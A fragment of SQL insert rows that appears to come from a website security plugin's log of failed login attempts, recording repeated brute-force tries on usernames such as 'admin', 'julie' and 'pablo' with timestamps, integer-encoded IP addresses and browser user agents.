(100901, 1496671029.589165, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100900, 1496671029.280811, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100899, 1496671028.968602, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100898, 1496671028.660404, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100897, 1496671028.352838, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100896, 1496671028.043947, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100895, 1496671027.732892, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100894, 1496671027.424609, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100893, 1496671027.116692, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100892, 1496671026.735394, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100891, 1496649439.026567, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100890, 1496649438.715356, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100889, 1496649438.406839, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100888, 1496649438.099223, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100887, 1496649437.789447, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100886, 1496649437.476428, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100885, 1496649437.162568, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100884, 1496649436.790293, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100883, 1496649436.479643, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100882, 1496649436.169982, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100881, 1496649435.861299, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100880, 1496649435.552564, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100879, 1496649435.244051, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100878, 1496649434.932181, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100877, 1496649434.621298, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100876, 1496649434.311358, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100875, 1496649434.003478, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100874, 1496649433.694087, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100873, 1496649433.379529, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100872, 1496630998.285053, 1, 'loginFailValidUsername', 'admin', 1, 3063980351, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100871, 1496630996.753264, 1, 'loginFailValidUsername', 'pablo', 3, 3063980351, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100870, 1496630995.208833, 1, 'loginFailInvalidUsername', 'julie pierrard', 0, 3063980351, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100869, 1496630993.665729, 1, 'loginFailValidUsername', 'julie', 2, 3063980351, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100868, 1496630992.080663, 1, 'loginFailValidUsername', 'julie', 2, 3063980351, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100867, 1496620629.640516, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100866, 1496620629.331696, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100865, 1496620629.023740, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100864, 1496620628.715556, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100863, 1496620628.407472, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100862, 1496620628.098737, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100861, 1496620627.789995, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100860, 1496620627.482068, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100859, 1496620627.174032, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100858, 1496620626.865905, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100857, 1496620626.557828, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100856, 1496620626.248662, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100855, 1496620625.938303, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100854, 1496620625.630042, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100853, 1496620625.317774, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100852, 1496620625.009914, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100851, 1496620624.701807, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100850, 1496620624.394017, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100849, 1496620624.065056, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100848, 1496614560.497707, 1, 'loginFailValidUsername', 'julie', 2, 2833926914, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100847, 1496600286.402210, 1, 'loginFailValidUsername', 'julie', 2, 1307193800, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100846, 1496599615.564602, 1, 'loginFailInvalidUsername', 'center', 0, 3326602014, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100845, 1496599613.445549, 1, 'loginFailInvalidUsername', 'namur', 0, 3326602014, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100844, 1496599611.545982, 1, 'loginFailInvalidUsername', 'travail', 0, 3326602014, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100843, 1496599609.503254, 1, 'loginFailInvalidUsername', 'professionnel', 0, 3326602014, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100842, 1496599607.599626, 1, 'loginFailInvalidUsername', 'outils', 0, 3326602014, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100841, 1496599605.503834, 1, 'loginFailInvalidUsername', 'venez', 0, 3326602014, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100840, 1496599603.606198, 1, 'loginFailInvalidUsername', 'objectifs', 0, 3326602014, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100839, 1496599601.682233, 1, 'loginFailInvalidUsername', 'cross', 0, 3326602014, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100838, 1496599599.548893, 1, 'loginFailInvalidUsername', 'pour', 0, 3326602014, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100837, 1496599597.349796, 1, 'loginFailInvalidUsername', 'notre', 0, 3326602014, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100836, 1496599149.782007, 1, 'loginFailInvalidUsername', 'training', 0, 3635199372, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100835, 1496599147.822906, 1, 'loginFailInvalidUsername', 'vous', 0, 3635199372, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100834, 1496599145.842630, 1, 'loginFailValidUsername', 'pablo', 3, 3635199372, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100833, 1496599143.800369, 1, 'loginFailValidUsername', 'julie', 2, 3635199372, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100832, 1496599141.646385, 1, 'loginFailValidUsername', 'admin', 1, 3635199372, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100831, 1496599139.624256, 1, 'loginFailInvalidUsername', 'center', 0, 3635199372, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100830, 1496599137.616583, 1, 'loginFailInvalidUsername', 'namur', 0, 3635199372, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100829, 1496599135.662349, 1, 'loginFailInvalidUsername', 'travail', 0, 3635199372, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100828, 1496599133.332626, 1, 'loginFailInvalidUsername', 'professionnel', 0, 3635199372, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100827, 1496599131.214729, 1, 'loginFailInvalidUsername', 'outils', 0, 3635199372, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100826, 1496598371.429855, 1, 'loginFailInvalidUsername', 'venez', 0, 3164986572, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100825, 1496598369.636971, 1, 'loginFailInvalidUsername', 'objectifs', 0, 3164986572, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100824, 1496598368.000931, 1, 'loginFailInvalidUsername', 'cross', 0, 3164986572, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100823, 1496598366.306186, 1, 'loginFailInvalidUsername', 'pour', 0, 3164986572, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100822, 1496598364.631717, 1, 'loginFailInvalidUsername', 'notre', 0, 3164986572, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100821, 1496598362.955987, 1, 'loginFailInvalidUsername', 'training', 0, 3164986572, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100820, 1496598361.318593, 1, 'loginFailInvalidUsername', 'vous', 0, 3164986572, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100819, 1496598359.671821, 1, 'loginFailValidUsername', 'pablo', 3, 3164986572, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100818, 1496598358.034289, 1, 'loginFailValidUsername', 'julie', 2, 3164986572, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100817, 1496598356.337133, 1, 'loginFailValidUsername', 'admin', 1, 3164986572, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100816, 1496597937.142829, 1, 'loginFailInvalidUsername', 'notre', 0, 874456664, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100815, 1496597512.485643, 1, 'loginFailInvalidUsername', 'outils', 0, 1707700163, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100814, 1496525607.939128, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539837082, 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)'),
(100813, 1496525307.229183, 1, 'loginFailValidUsername', 'admin', 1, 1539837082, 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)'),
(100812, 1496525008.217242, 1, 'loginFailInvalidUsername', 'Cross', 0, 1539837082, 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)'),
(100811, 1496524706.704205, 1, 'loginFailInvalidUsername', 'www.crosstrainingcenter.be', 0, 1539837082, 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)'),
(100810, 1496524406.316551, 1, 'loginFailInvalidUsername', 'www.crosstrainingcenter.be', 0, 1539837082, 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)'),
(100809, 1496515377.840222, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539837019, 'Mozilla/5.0 (Windows NT 5.0) AppleWebKit/533.04.57 (KHTML, like Gecko) Version/5.5.1 Safari/532.12'),
(100808, 1496512596.167746, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100807, 1496512595.850822, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100806, 1496512595.541095, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100805, 1496512595.231242, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100804, 1496512594.922909, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100803, 1496512594.614870, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100802, 1496512594.302767, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100801, 1496512593.993520, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100800, 1496512593.685425, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100799, 1496512593.375393, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100798, 1496512593.067824, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100797, 1496512592.758986, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100796, 1496512592.451028, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100795, 1496512592.143566, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100794, 1496512591.834312, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100793, 1496512591.525989, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100792, 1496512591.217321, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100791, 1496512590.908880, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100790, 1496512590.558421, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100789, 1496486529.935212, 1, 'loginFailValidUsername', 'admin', 1, 2249451223, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100788, 1496486529.935096, 1, 'loginFailValidUsername', 'admin', 1, 2249451223, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100787, 1496483793.117858, 1, 'loginFailInvalidUsername', 'wocaoaaaa', 0, 1539836946, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0'),
(100786, 1496483256.847156, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100785, 1496483256.537733, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100784, 1496483256.228181, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100783, 1496483255.918518, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100782, 1496483255.609853, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100781, 1496483255.301011, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100780, 1496483254.992887, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100779, 1496483254.684882, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100778, 1496483254.377038, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100777, 1496483254.065764, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100776, 1496483253.751747, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100775, 1496483253.444060, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100774, 1496483253.133240, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100773, 1496483252.822791, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100772, 1496483252.514296, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100771, 1496483252.205200, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100770, 1496483251.893127, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100769, 1496483251.582768, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100768, 1496483251.244556, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100767, 1496463022.038812, 1, 'loginFailInvalidUsername', 'outils', 0, 1741512757, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100766, 1496462079.792264, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100765, 1496462079.482473, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100764, 1496462079.174150, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100763, 1496462078.865377, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100762, 1496462078.556639, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100761, 1496462076.125976, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100760, 1496462075.817446, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100759, 1496462075.508702, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
